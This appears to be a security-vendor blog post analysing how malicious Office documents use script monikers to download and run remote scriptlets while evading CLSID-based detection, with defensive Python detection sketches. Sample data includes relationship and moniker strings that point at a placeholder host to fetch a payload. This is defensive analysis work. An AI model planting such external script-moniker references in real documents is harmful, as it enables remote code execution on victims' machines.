When Scriptlets Attack: The Moniker
Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani
In the previous article, we described an attack that uses a script moniker to execute a Windows Script Component (WSC) file, or scriptlet. A scriptlet is nothing more than an XML file wrapping a script written in JScript, VBScript, or a similar language. With this method, neither macros nor shellcode are required to run arbitrary code. This opens a huge door for cybercriminals to break into an end-user system without having to develop sophisticated exploits or generate highly obfuscated macro code, while still using document files and logic flaws in Microsoft Office to deliver malware.
In this article, we will go through the details of how document files can achieve remote code execution by using monikers crafted to evade signature-based detection techniques relying on blacklisted CLSIDs, and how these monikers function under the hood.
It’s worth mentioning that this is not the first time we have seen document exploits abusing logic flaws. We have previously seen this in the CVE-2017-0199 (HTA handler) and CVE-2017-8759 (SOAP WSDL parser) vulnerabilities. One particularly interesting detail that caught our attention for this blog post is how crooks evade static detection of potentially dangerous CLSIDs embedded in OLE streams: these CLSIDs are widely used in document exploits to load specific non-ASLR COM libraries, a step necessary to bypass mitigation techniques such as ASLR and DEP.
Code Execution in Documents
The most interesting part for a researcher when analyzing a malicious document file is to understand what kind of methods are involved to achieve code execution. Answering this question is the most essential step to developing strong protection mechanisms against upcoming threats.
One straightforward way to perform code execution from a document file is to embed (typically highly obfuscated) macro code. This, however, is easily countered by modern static analysis tools, code emulators, sandboxes, and machine learning systems that are able to find this type of anomaly and immediately block the threat. Moreover, Microsoft Office disables macro code execution by default, preventing the end user from being infected in the first place. The only remaining approach is to persuade the user to enable macro code execution manually. However, this is a well-known malicious technique: enabling macro code execution for documents coming from an untrusted source is known to be dangerous.
Another approach is to use shellcode or position independent code. To build an exploit, the attacker usually utilizes base addresses of known non-ASLR executables to either directly run an external program (see Figure 1 for a sample exploiting CVE-2017-11882) or “slide” the execution flow to the shellcode through a long sequence of instructions, also known as ROP chains.
These ROP chains are used to bypass Data Execution Prevention (DEP) by executing small pieces of libraries’ code to change the protection of memory allocated for further shellcode execution.
To increase the probability of successful shellcode execution, the attacker uses heap spraying, a method to allocate and fill (large) blocks of virtual memory. By using this method, the attacker fills the memory with RET-sleds (along with NOP-sleds) and shellcode (usually stored in the ActiveX streams). Later, leveraging a vulnerability, the execution flow is transferred somewhere in that memory region, and both gadgets and shellcode are finally executed (see Figure 2 for an example).
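From a defender's point of view, a sprayed sled tends to show up as a long run of one repeated 4-byte value. The following is a minimal detection sketch under that assumption, not a description of any particular product's logic. The function name, the `Run` tuple, and the gadget address are all hypothetical, and the scan assumes the sled is 4-byte aligned relative to the start of the stream.

```python
import struct
from collections import namedtuple

# offset: byte offset where the run starts, value: repeated DWORD, count: repetitions
Run = namedtuple("Run", "offset value count")


def longest_dword_run(data: bytes) -> Run:
    """Return the longest run of identical, 4-byte-aligned little-endian DWORDs."""
    best = Run(0, 0, 0)
    run_start, run_value, run_len = 0, None, 0
    usable = len(data) - len(data) % 4  # ignore a trailing partial DWORD
    for offset in range(0, usable, 4):
        (value,) = struct.unpack_from("<I", data, offset)
        if value == run_value:
            run_len += 1
        else:
            run_start, run_value, run_len = offset, value, 1
        if run_len > best.count:
            best = Run(run_start, run_value, run_len)
    return best


# Synthetic stream: 16 bytes of padding, a 512-entry sled, then filler bytes.
HYPOTHETICAL_GADGET = 0x12345678  # placeholder value, not a real gadget address
sample = (
    b"\x00\x01\x02\x03" * 4
    + struct.pack("<I", HYPOTHETICAL_GADGET) * 512
    + b"\xcc" * 32
)
run = longest_dword_run(sample)
print(hex(run.value), run.count, run.offset)
```

A scanner built on this idea would still need a threshold for what counts as "long" and a way to handle unaligned sleds, for example by repeating the scan at byte offsets 1 to 3.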
The RET-sleds are instructions that may have the following format (for example, the non-ASLR library MSVBVM60.dll, CVE-2017-11826):
Their aim is to move the current stack pointer, ESP, down until the execution flow reaches the VirtualProtect function (or any other function that changes the memory protection to bypass the DEP):
Both methods (DEP and ASLR bypass), along with shellcode patterns and suspicious embedded objects (OLE), have been known to malware authors and security researchers for quite a while. A huge weakness of this approach is that libraries must be loaded at a predictable memory location. Otherwise, if the location is random (as is the case with ASLR enabled) or the version of the library is unexpected, the attack will fail.
And this is the biggest problem for the attacker.
Monikers: A New Way to Execute Code
For those who are not familiar with this concept, a moniker is just an object that names another one—that is, a symbolic name of an object, an interface to data coupled with its associated context. There are several types of monikers provided by the Microsoft Windows operating system: File, Class, Composite, and URL monikers, to name a few. Some of them (such as SOAP moniker) are already known to have logic bugs that lead to remote code execution.
Monikers are specified as names instead of CLSIDs. Thus, instead of calling CoCreateInstance to load a COM library associated with a specified CLSID, an application calls the COM MkParseDisplayName API to convert the string name into a moniker. Practically, this means that there is no need to embed a CLSID in a document file to load a specific object (such as a non-ASLR module), which could raise suspicion on the target machine. It’s also worth mentioning that, as opposed to the LoadLibrary API used to load a normal Windows DLL, COM libraries are loaded by either calling the CoCreateInstance API or a custom creation function (in the case of monikers).
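To make the evasion concrete, here is a minimal sketch of a signature-style check that searches raw stream bytes for blacklisted CLSIDs. It is an illustration under our own assumptions, not the logic of any specific scanner: the blacklist entry is a made-up placeholder GUID, and the function and variable names are hypothetical.

```python
import uuid

# Hypothetical blacklist entry (placeholder GUID, not a real COM class).
BLACKLISTED_CLSIDS = [uuid.UUID("11111111-2222-3333-4444-555555555555")]


def find_blacklisted_clsids(stream: bytes):
    """Return the blacklisted CLSIDs that appear in the stream in binary or text form."""
    hits = []
    for clsid in BLACKLISTED_CLSIDS:
        needles = (
            clsid.bytes_le,                      # binary GUID layout used by COM/OLE
            str(clsid).encode("ascii"),          # lowercase text form
            str(clsid).upper().encode("ascii"),  # uppercase text form
        )
        if any(needle in stream for needle in needles):
            hits.append(clsid)
    return hits


# A stream that embeds the CLSID directly is flagged ...
stream_with_clsid = b"\x01\x00" + BLACKLISTED_CLSIDS[0].bytes_le + b"\x00" * 8
# ... while a payload that only carries a moniker name contains no CLSID at all.
moniker_only_payload = "script:http://example.invalid/a.sct".encode("utf-16-le")

print(find_blacklisted_clsids(stream_with_clsid))
print(find_blacklisted_clsids(moniker_only_payload))
```

The second call returns an empty list, which is exactly the gap a name-based moniker exploits: the CLSID is only resolved on the target machine at parse time.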
Static Document Analysis: External Objects
The picture below (sha1: c5b1abceeda2d4607b3d8890979980d553ab1937) is an example of what an external object looks like when embedded in a suspicious document:
As we can see, the embedded OLE is an external resource, outside the document package. This is expressed by the TargetMode attribute of the Relationship element set to External. The Target attribute defines the actual location of the related resource which, in this case, contains the URL (the moniker data) together with the script keyword (the moniker class) needed to specify how to interpret the resource.
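The check described above can be sketched statically. The snippet below parses a relationships part and reports every Relationship whose TargetMode is External and whose Target starts with the script moniker class. It is a simplified illustration: the sample XML, its URL, and the function name are our own assumptions and are not taken from the analyzed document.

```python
import xml.etree.ElementTree as ET

# Namespace used by relationship parts in Office Open XML packages.
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_script_targets(rels_xml: bytes):
    """Return (Id, Target) pairs for external relationships that use a script moniker."""
    root = ET.fromstring(rels_xml)
    hits = []
    for rel in root.iter(RELS_NS + "Relationship"):
        target = rel.get("Target", "")
        is_external = rel.get("TargetMode") == "External"
        if is_external and target.lower().startswith("script:"):
            hits.append((rel.get("Id"), target))
    return hits


# Hypothetical relationships part; example.invalid is a reserved, non-resolving domain.
sample_rels = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="script:http://example.invalid/payload.sct" TargetMode="External"/>
</Relationships>"""

print(external_script_targets(sample_rels))
```

In practice the relationship parts would be read out of the document's ZIP container (for example with Python's `zipfile` module) before being passed to a function like this one.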
Dynamic Document Analysis: Script Monikers
As we have mentioned above, the malicious document can just use a name, parsed by the MkParseDisplayName API, to create the necessary object and access the IMoniker interface. After calling MkParseDisplayName, a client (such as the Microsoft Office process) calls OleCreateLink to run the remote scriptlet file (see Figure 4).
To start working with the moniker, the client calls the CreateBindCtx API to create a bind context that contains the information about a moniker binding operation. Then, after creating a moniker (MkParseDisplayName), it invokes BindToObject to activate the script engine and execute the file (a scriptlet in our case).
If you recall, each name of the script moniker is a combination of the moniker class and the moniker data separated by a colon. Thus, to parse the moniker string, the MkParseDisplayName API internally calls FindClassMoniker and later FindProgIdMoniker:
The FindClassID function is then responsible for splitting the prefix (the moniker class) from the URI (moniker data):
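Purely as an illustration of the idea, and not as a reconstruction of the COM code, the split at the first colon can be expressed in a few lines of Python. The function name is hypothetical, and the real parser handles more forms of display names than this sketch does.

```python
def split_moniker_name(display_name: str):
    """Split 'class:data' at the first colon into (moniker class, moniker data)."""
    moniker_class, separator, moniker_data = display_name.partition(":")
    if not separator or not moniker_class or not moniker_data:
        raise ValueError("expected a name of the form <class>:<data>")
    return moniker_class, moniker_data


# Only the first colon separates class from data; the colon in 'http:' is kept.
print(split_moniker_name("script:http://example.invalid/payload.sct"))
```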
Once done, the moniker class causes the respective library to be loaded in the Microsoft Office process: in our example, the moniker class is script, so the scrobj.dll is loaded. This is achieved by looking up the registry key value stored for the CLSID:
In order to find the value, the function OpenClassesRootKeyExW goes to the HKEY_CLASSES_ROOT registry section and looks for the moniker class name, which is script:
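The same lookup can be reproduced by hand on a Windows analysis machine. The sketch below uses Python's standard `winreg` module and assumes the usual ProgID layout, where the default value of the `CLSID` subkey holds the class identifier. The function name is our own, and on non-Windows systems it simply returns None.

```python
import sys


def clsid_for_moniker_class(moniker_class: str):
    """Return the CLSID string stored under HKEY_CLASSES_ROOT\\<class>\\CLSID, or None."""
    if sys.platform != "win32":
        return None  # the registry only exists on Windows
    import winreg  # imported lazily so the sketch also loads on other platforms

    try:
        with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, moniker_class + r"\CLSID") as key:
            value, _value_type = winreg.QueryValueEx(key, "")  # "" selects the default value
            return value
    except OSError:
        return None  # key or value not present


print(clsid_for_moniker_class("script"))
```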
The second part of the moniker name, the moniker data, is interpreted as a hyperlink to a scriptlet file that will be downloaded (by calling the HttpSendRequestW function) from the remote server. To decode the gzipped scriptlet file, MS Office calls ConvertXMLBytesToUnicode from the already loaded scriptlet run-time component (scrobj.dll):
Then the library parses the XML file, compiles the embedded code (VBScript, JScript, etc.) and, finally, executes it.
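For offline triage of a captured response, the decode-and-parse steps can be approximated as follows. This is a rough sketch under several assumptions: the body is either raw or gzip-compressed, the scriptlet is well-formed XML (real samples are not always), and the sample content is a harmless placeholder we made up. It does not model what scrobj.dll does internally.

```python
import gzip
import xml.etree.ElementTree as ET


def extract_scripts(body: bytes):
    """Return (language, source) pairs for every <script> element in a scriptlet."""
    if body[:2] == b"\x1f\x8b":  # gzip magic bytes
        body = gzip.decompress(body)
    root = ET.fromstring(body)
    return [
        (element.get("language", ""), (element.text or "").strip())
        for element in root.iter("script")
    ]


# Hypothetical, harmless scriptlet used only to exercise the parser.
sample_scriptlet = b"""<?xml version="1.0"?>
<scriptlet>
  <registration description="demo" progid="demo.scriptlet" version="1.00"/>
  <script language="JScript"><![CDATA[
    var greeting = "hello";
  ]]></script>
</scriptlet>"""

scripts = extract_scripts(gzip.compress(sample_scriptlet))
print(scripts)
```

Extracting the embedded script this way lets an analyst review the code without ever handing it to a script engine.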
Below is an analysis overview that illustrates Lastline’s ability to detect scriptlet execution in the context of the malicious Microsoft Office PowerPoint Slideshow (PPSX) file (sha1: c5b1abceeda2d4607b3d8890979980d553ab1937):
As one can see, the sandbox is able to use not only the scriptlet’s behavior to classify the document as malicious, but it also understands how this behavior is triggered, adding yet another source of anomalies for classifying the document.
As you can see from the example described in this post, scriptlets located on a remote server can be used to run arbitrary code in Microsoft Office in addition to traditional techniques like macros and shellcode. For such attacks, the attacker can essentially abandon suspicious, hardcoded CLSIDs embedded in document files and instead just use simple names—monikers—to evade signature-based detection and achieve remote code execution.